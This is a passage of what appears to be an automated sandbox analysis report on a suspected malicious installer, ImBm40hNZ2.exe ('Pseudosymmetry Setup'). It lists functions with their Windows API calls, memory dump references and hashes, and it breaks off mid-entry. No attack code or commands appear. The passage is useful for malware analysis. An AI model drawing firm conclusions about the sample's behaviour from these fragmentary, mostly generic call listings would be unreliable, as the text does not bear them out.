                                                                                                                                                                                                                                                                Function 00406A93 Relevance: .3, Instructions: 300COMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.16986239509.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.16986169395.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.16986311657.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.16986382385.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.16986382385.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.16986382385.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.16986382385.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.16986382385.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.16986382385.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.16986713463.0000000000445000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_ImBm40hNZ2.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                • Opcode ID: cfc95c657d6a0db03a2642adfba5b6cfeeb14fbd187f09afe888a59338c72224
                                                                                                                                                                                                                                                                • Instruction ID: b4f25317d252771113a51e42fbe22a4272178205f6f9d8c7b12ddd79a0432499
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: cfc95c657d6a0db03a2642adfba5b6cfeeb14fbd187f09afe888a59338c72224
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 1FC15B71A002598BCF18CF68C4905EEBBB2FF99314F26817AD856B7384D734A952CF84
                                                                                                                                                                                                                                                                Function 004039AC Relevance: 58.1, APIs: 32, Strings: 1, Instructions: 345windowstringCOMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 004039E8
                                                                                                                                                                                                                                                                • ShowWindow.USER32(?), ref: 00403A05
                                                                                                                                                                                                                                                                • DestroyWindow.USER32 ref: 00403A19
                                                                                                                                                                                                                                                                • SetWindowLongA.USER32(?,00000000,00000000), ref: 00403A35
                                                                                                                                                                                                                                                                • GetDlgItem.USER32(?,?), ref: 00403A56
                                                                                                                                                                                                                                                                • SendMessageA.USER32(00000000,000000F3,00000000,00000000), ref: 00403A6A
                                                                                                                                                                                                                                                                • IsWindowEnabled.USER32(00000000), ref: 00403A71
                                                                                                                                                                                                                                                                • GetDlgItem.USER32(?,00000001), ref: 00403B1F
                                                                                                                                                                                                                                                                • GetDlgItem.USER32(?,00000002), ref: 00403B29
                                                                                                                                                                                                                                                                • SetClassLongA.USER32(?,000000F2,?), ref: 00403B43
                                                                                                                                                                                                                                                                • SendMessageA.USER32(0000040F,00000000,00000001,?), ref: 00403B94
                                                                                                                                                                                                                                                                • GetDlgItem.USER32(?,?), ref: 00403C3A
                                                                                                                                                                                                                                                                • ShowWindow.USER32(00000000,?), ref: 00403C5B
                                                                                                                                                                                                                                                                • EnableWindow.USER32(?,?), ref: 00403C6D
                                                                                                                                                                                                                                                                • EnableWindow.USER32(?,?), ref: 00403C88
                                                                                                                                                                                                                                                                • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 00403C9E
                                                                                                                                                                                                                                                                • EnableMenuItem.USER32(00000000), ref: 00403CA5
                                                                                                                                                                                                                                                                • SendMessageA.USER32(?,000000F4,00000000,00000001), ref: 00403CBD
                                                                                                                                                                                                                                                                • SendMessageA.USER32(?,00000401,00000002,00000000), ref: 00403CD0
                                                                                                                                                                                                                                                                • lstrlenA.KERNEL32(00429820,?,00429820,Pseudosymmetry Setup), ref: 00403CF9
                                                                                                                                                                                                                                                                • SetWindowTextA.USER32(?,00429820), ref: 00403D08
                                                                                                                                                                                                                                                                • ShowWindow.USER32(?,0000000A), ref: 00403E3C
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.16986239509.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.16986169395.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.16986311657.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.16986382385.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.16986382385.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.16986382385.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.16986382385.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.16986382385.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.16986382385.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.16986713463.0000000000445000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_ImBm40hNZ2.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: Window$Item$MessageSend$EnableShow$LongMenu$ClassDestroyEnabledSystemTextlstrlen
                                                                                                                                                                                                                                                                • String ID: Pseudosymmetry Setup
                                                                                                                                                                                                                                                                • API String ID: 184305955-3340433627
                                                                                                                                                                                                                                                                • Opcode ID: 0f83a02af2a00702a4c2e4b6ad351fce485f3e04a4e7970156617f1793b5832a
                                                                                                                                                                                                                                                                • Instruction ID: 70023f4bb34e935c1cca3693f676be707b54b1f0636591b75eec942e7e5b916a
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 0f83a02af2a00702a4c2e4b6ad351fce485f3e04a4e7970156617f1793b5832a
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: F7C1B171A04200BBEB216F61ED45E2B3EACEB49706F50053EF541B21E1C779A942DB6E
                                                                                                                                                                                                                                                                Function 00403FC8 Relevance: 42.2, APIs: 20, Strings: 4, Instructions: 205windowstringCOMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • CheckDlgButton.USER32(00000000,-0000040A,00000001), ref: 00404053
                                                                                                                                                                                                                                                                • GetDlgItem.USER32(00000000,000003E8), ref: 00404067
                                                                                                                                                                                                                                                                • SendMessageA.USER32(00000000,0000045B,00000001,00000000), ref: 00404085
                                                                                                                                                                                                                                                                • GetSysColor.USER32(?), ref: 00404096
                                                                                                                                                                                                                                                                • SendMessageA.USER32(00000000,00000443,00000000,?), ref: 004040A5
                                                                                                                                                                                                                                                                • SendMessageA.USER32(00000000,00000445,00000000,04010000), ref: 004040B4
                                                                                                                                                                                                                                                                • lstrlenA.KERNEL32(?), ref: 004040B7
                                                                                                                                                                                                                                                                • SendMessageA.USER32(00000000,00000435,00000000,00000000), ref: 004040C6
                                                                                                                                                                                                                                                                • SendMessageA.USER32(00000000,00000449,?,00000110), ref: 004040DB
                                                                                                                                                                                                                                                                • GetDlgItem.USER32(?,0000040A), ref: 0040413D
                                                                                                                                                                                                                                                                • SendMessageA.USER32(00000000), ref: 00404140
                                                                                                                                                                                                                                                                • GetDlgItem.USER32(?,000003E8), ref: 0040416B
                                                                                                                                                                                                                                                                • SendMessageA.USER32(00000000,0000044B,00000000,00000201), ref: 004041AB
                                                                                                                                                                                                                                                                • LoadCursorA.USER32(00000000,00007F02), ref: 004041BA
                                                                                                                                                                                                                                                                • SetCursor.USER32(00000000), ref: 004041C3
                                                                                                                                                                                                                                                                • ShellExecuteA.SHELL32(0000070B,open,0042D340,00000000,00000000,00000001), ref: 004041D6
                                                                                                                                                                                                                                                                • LoadCursorA.USER32(00000000,00007F00), ref: 004041E3
                                                                                                                                                                                                                                                                • SetCursor.USER32(00000000), ref: 004041E6
                                                                                                                                                                                                                                                                • SendMessageA.USER32(00000111,00000001,00000000), ref: 00404212
                                                                                                                                                                                                                                                                • SendMessageA.USER32(00000010,00000000,00000000), ref: 00404226
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.16986239509.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.16986169395.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.16986311657.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.16986382385.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.16986382385.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.16986382385.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.16986382385.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.16986382385.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.16986382385.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.16986713463.0000000000445000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_ImBm40hNZ2.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorExecuteShelllstrlen
                                                                                                                                                                                                                                                                • String ID: Call$N$XRS$open
                                                                                                                                                                                                                                                                • API String ID: 3615053054-3294337457
                                                                                                                                                                                                                                                                • Opcode ID: bd37493bba8a7160a5fbdbedca7196346d7bbe886d3872d1f711f9678ebaf451
                                                                                                                                                                                                                                                                • Instruction ID: 4a720cbc7ced66984b2347167a4dd5be7871a0de437cfd71c5777b4804bda38e
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: bd37493bba8a7160a5fbdbedca7196346d7bbe886d3872d1f711f9678ebaf451
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: CA61C2B1A40209BFEB109F61CC45F6A7B69FB84701F10407AFB00BA2D1C7B8A951CF99
                                                                                                                                                                                                                                                                Function 00401000 Relevance: 28.1, APIs: 14, Strings: 2, Instructions: 125COMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • DefWindowProcA.USER32(?,00000046,?,?), ref: 0040102C
                                                                                                                                                                                                                                                                • BeginPaint.USER32(?,?), ref: 00401047
                                                                                                                                                                                                                                                                • GetClientRect.USER32(?,?), ref: 0040105B
                                                                                                                                                                                                                                                                • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                                                                                                                                                                                                                                                                • FillRect.USER32(00000000,?,00000000), ref: 004010E4
                                                                                                                                                                                                                                                                • DeleteObject.GDI32(?), ref: 004010ED
                                                                                                                                                                                                                                                                • CreateFontIndirectA.GDI32(?), ref: 00401105
                                                                                                                                                                                                                                                                • SetBkMode.GDI32(00000000,00000001), ref: 00401126
                                                                                                                                                                                                                                                                • SetTextColor.GDI32(00000000,000000FF), ref: 00401130
                                                                                                                                                                                                                                                                • SelectObject.GDI32(00000000,?), ref: 00401140
                                                                                                                                                                                                                                                                • DrawTextA.USER32(00000000,Pseudosymmetry Setup,000000FF,00000010,00000820), ref: 00401156
                                                                                                                                                                                                                                                                • SelectObject.GDI32(00000000,00000000), ref: 00401160
                                                                                                                                                                                                                                                                • DeleteObject.GDI32(?), ref: 00401165
                                                                                                                                                                                                                                                                • EndPaint.USER32(?,?), ref: 0040116E
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.16986239509.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.16986169395.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.16986311657.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.16986382385.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.16986382385.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.16986382385.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.16986382385.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.16986382385.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.16986382385.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.16986713463.0000000000445000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_ImBm40hNZ2.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                                                                                                                                                                                                                                                • String ID: F$Pseudosymmetry Setup
                                                                                                                                                                                                                                                                • API String ID: 941294808-1567132306
                                                                                                                                                                                                                                                                • Opcode ID: 91a2245b94a8841dbbb3e7c6d70d151623849c123f413ff1f54cc8de7c044c5d
                                                                                                                                                                                                                                                                • Instruction ID: 56390ffcd2b5ebfb5c65d4f338f2fcdd02e5d2b15fd4a6b60b61e3d9fa1f9be4
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 91a2245b94a8841dbbb3e7c6d70d151623849c123f413ff1f54cc8de7c044c5d
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 5E418971804249AFCB058F95DD459AFBBB9FF44311F00812AF962AA1A0C738EA51DFA5
                                                                                                                                                                                                                                                                Function 004058C9 Relevance: 26.4, APIs: 12, Strings: 3, Instructions: 136stringmemoryfileCOMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • lstrcpyA.KERNEL32(0042B5B0,NUL,?,00000000,?,00000000,?,00405A6D,?,?,00000001,00405610,?,00000000,000000F1,?), ref: 004058D9
                                                                                                                                                                                                                                                                • CloseHandle.KERNEL32(00000000,00000000,00000000,00000001,?,00000000,?,00405A6D,?,?,00000001,00405610,?,00000000,000000F1,?), ref: 004058FD
                                                                                                                                                                                                                                                                • GetShortPathNameA.KERNEL32(00000000,0042B5B0,00000400), ref: 00405906
                                                                                                                                                                                                                                                                  • Part of subcall function 00405787: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,004059B6,00000000,[Rename],00000000,00000000,00000000), ref: 00405797
                                                                                                                                                                                                                                                                  • Part of subcall function 00405787: lstrlenA.KERNEL32(004059B6,?,00000000,004059B6,00000000,[Rename],00000000,00000000,00000000), ref: 004057C9
                                                                                                                                                                                                                                                                • GetShortPathNameA.KERNEL32(?,0042B9B0,00000400), ref: 00405923
                                                                                                                                                                                                                                                                • wsprintfA.USER32 ref: 00405941
                                                                                                                                                                                                                                                                • GetFileSize.KERNEL32(00000000,00000000,0042B9B0,C0000000,00000004,0042B9B0,?,?,?,?,?), ref: 0040597C
                                                                                                                                                                                                                                                                • GlobalAlloc.KERNEL32(00000040,0000000A), ref: 0040598B
                                                                                                                                                                                                                                                                • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000), ref: 004059C3
                                                                                                                                                                                                                                                                • SetFilePointer.KERNEL32(?,00000000,00000000,00000000,00000000,0042B1B0,00000000,-0000000A,0040936C,00000000,[Rename],00000000,00000000,00000000), ref: 00405A19
                                                                                                                                                                                                                                                                • WriteFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 00405A2B
                                                                                                                                                                                                                                                                • GlobalFree.KERNEL32(00000000), ref: 00405A32
                                                                                                                                                                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 00405A39
                                                                                                                                                                                                                                                                  • Part of subcall function 00405822: GetFileAttributesA.KERNELBASE(?,00402C69,C:\Users\user\Desktop\ImBm40hNZ2.exe,80000000,?), ref: 00405826
                                                                                                                                                                                                                                                                  • Part of subcall function 00405822: CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405848
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.16986239509.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.16986169395.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.16986311657.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.16986382385.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.16986382385.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.16986382385.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.16986382385.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.16986382385.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.16986382385.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.16986713463.0000000000445000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_ImBm40hNZ2.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: File$CloseGlobalHandleNamePathShortlstrcpylstrlen$AllocAttributesCreateFreePointerSizeWritewsprintf
                                                                                                                                                                                                                                                                • String ID: %s=%s$NUL$[Rename]
                                                                                                                                                                                                                                                                • API String ID: 1265525490-4148678300
                                                                                                                                                                                                                                                                • Opcode ID: 7635303e975da501c1c3991c5ee2ae1dd735d065c9962b08a0d3fc1ba04b1bfc
                                                                                                                                                                                                                                                                • Instruction ID: a7ae131883122c305ebb5a94e4791e7dc74bc152dd9dfe90db1d6281d1838ee4
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 7635303e975da501c1c3991c5ee2ae1dd735d065c9962b08a0d3fc1ba04b1bfc
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: EE41EF71A05A55AFD3206B215C89F6B3A5CEB45758F14053ABE02B22D2DA7CAC018EBD
                                                                                                                                                                                                                                                                Function 100023D6 Relevance: 13.6, APIs: 9, Instructions: 130memoryCOMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • wsprintfA.USER32 ref: 1000243D
                                                                                                                                                                                                                                                                • GlobalAlloc.KERNEL32(00000040,?,?,?,?,00000000,00000001,100017D5,00000000), ref: 10002455
                                                                                                                                                                                                                                                                • StringFromGUID2.OLE32(?,00000000,?,?,?,00000000,00000001,100017D5,00000000), ref: 10002466
                                                                                                                                                                                                                                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,?,?,00000000,00000001,100017D5,00000000), ref: 1000247B
                                                                                                                                                                                                                                                                • GlobalFree.KERNEL32(00000000), ref: 10002482
                                                                                                                                                                                                                                                                  • Part of subcall function 100012E8: lstrcpyA.KERNEL32(-1000404B,00000000,?,10001199,?,00000000), ref: 10001310
                                                                                                                                                                                                                                                                • GlobalFree.KERNEL32(?), ref: 100024F0
                                                                                                                                                                                                                                                                • GlobalFree.KERNEL32(00000000), ref: 10002519
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.16992325573.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.16992292481.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.16992356898.0000000010003000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.16992388430.0000000010005000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_10000000_ImBm40hNZ2.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: Global$Free$AllocByteCharFromMultiStringWidelstrcpywsprintf
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 2278267121-0
                                                                                                                                                                                                                                                                • Opcode ID: ef8d39a89eb95cdffd39ed95cde5a9d48ed42f12edcbc88745b4f86f25811587
                                                                                                                                                                                                                                                                • Instruction ID: 4c31113825cd6d876adfd950bde12b9626868b5f7bcca2444e77b9607fd07d19
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: ef8d39a89eb95cdffd39ed95cde5a9d48ed42f12edcbc88745b4f86f25811587
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 7A41AEB150825AEFFB11DFA4CDC8E2B7BECFB442C1B124529FA0182168DB31AD40DB25
                                                                                                                                                                                                                                                                Function 00405DFC Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 69COMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • CharNextA.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\ImBm40hNZ2.exe",C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,004030BA,C:\Users\user\AppData\Local\Temp\,756A3410,00403294), ref: 00405E54
                                                                                                                                                                                                                                                                • CharNextA.USER32(?,?,?,00000000), ref: 00405E61
                                                                                                                                                                                                                                                                • CharNextA.USER32(?,"C:\Users\user\Desktop\ImBm40hNZ2.exe",C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,004030BA,C:\Users\user\AppData\Local\Temp\,756A3410,00403294), ref: 00405E66
                                                                                                                                                                                                                                                                • CharPrevA.USER32(?,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,004030BA,C:\Users\user\AppData\Local\Temp\,756A3410,00403294), ref: 00405E76
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.16986239509.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.16986169395.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.16986311657.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.16986382385.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.16986382385.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.16986382385.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.16986382385.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.16986382385.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.16986382385.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.16986713463.0000000000445000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_ImBm40hNZ2.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: Char$Next$Prev
                                                                                                                                                                                                                                                                • String ID: "C:\Users\user\Desktop\ImBm40hNZ2.exe"$*?|<>/":$C:\Users\user\AppData\Local\Temp\
                                                                                                                                                                                                                                                                • API String ID: 589700163-325535441
                                                                                                                                                                                                                                                                • Opcode ID: 23e10a89c186aeb9d4ae81216154e90e4a11c9f17e12c8179a136c01dc061f6b
                                                                                                                                                                                                                                                                • Instruction ID: d9f26e5b90d06d21ed3ce52f9e74cde850698f16693a1e2037ff65b0147420f0
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 23e10a89c186aeb9d4ae81216154e90e4a11c9f17e12c8179a136c01dc061f6b
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: E111C872804B9529EB3217348C44B777F99CB967A0F58047BE8D4722C2D67C5E428EAD
                                                                                                                                                                                                                                                                Function 00403EE6 Relevance: 12.1, APIs: 8, Instructions: 61COMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • GetWindowLongA.USER32(?,000000EB), ref: 00403F03
                                                                                                                                                                                                                                                                • GetSysColor.USER32(00000000), ref: 00403F1F
                                                                                                                                                                                                                                                                • SetTextColor.GDI32(?,00000000), ref: 00403F2B
                                                                                                                                                                                                                                                                • SetBkMode.GDI32(?,?), ref: 00403F37
                                                                                                                                                                                                                                                                • GetSysColor.USER32(?), ref: 00403F4A
                                                                                                                                                                                                                                                                • SetBkColor.GDI32(?,?), ref: 00403F5A
                                                                                                                                                                                                                                                                • DeleteObject.GDI32(?), ref: 00403F74
                                                                                                                                                                                                                                                                • CreateBrushIndirect.GDI32(?), ref: 00403F7E
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.16986239509.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.16986169395.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.16986311657.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.16986382385.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.16986382385.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.16986382385.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.16986382385.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.16986382385.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.16986382385.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.16986713463.0000000000445000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_ImBm40hNZ2.jbxd
                                                                                                                                                                                                                                                                Similarity
